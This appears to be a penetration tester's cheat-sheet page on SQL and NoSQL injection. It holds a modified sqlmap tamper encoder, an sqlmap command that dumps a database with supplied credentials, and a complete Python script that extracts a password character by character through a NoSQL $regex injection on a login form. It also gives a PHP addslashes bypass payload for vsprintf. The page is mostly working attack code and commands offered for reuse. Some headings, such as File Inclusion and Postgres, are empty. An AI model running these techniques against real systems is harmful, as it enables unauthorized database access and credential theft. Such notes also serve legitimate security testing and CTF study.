Comment on page

SQL Injection

SQLMap
Modify unicode encoding in "/usr/share/sqlmap/tamper/charunicodeencode.py":
while i < len(payload):
  if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
      retVal += "\\u00%s" % payload[i + 1:i + 3]
      i += 3
  else:
      retVal += '\\u%.4X' % ord(payload[i])
      i += 1
Connect with Credentials
sqlmap -d "mysql://<user>:<password>@<ip>/<database>" --dump 
NoSQL
​https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL Injection​
Retrieve password:
#!/usr/bin/env python3
import re
import requests
import string
​
chars = string.ascii_letters + string.digits + string.punctuation
password = ""
url = ""
done = False
​
while not done:
    done = True
    for c in chars:
        data = {
            "username": "",
            "password[$regex]": f"^{re.escape(password+c)}.*$",
            "login": "login"
        }
        r = requests.post(url, data=data, allow_redirects=False)
        if r.status_code == 302:     
            done = False       
            password += c
            print(f"[+] Found {c}")
print(f"[+] Password: {password}")
PHP addslashes bypass using vsprintf
If vsprintf is used we can send the query like this (replace * with your injection):
xxx%1$\%27)*

File Inclusion

Postgres

Last modified 9mo ago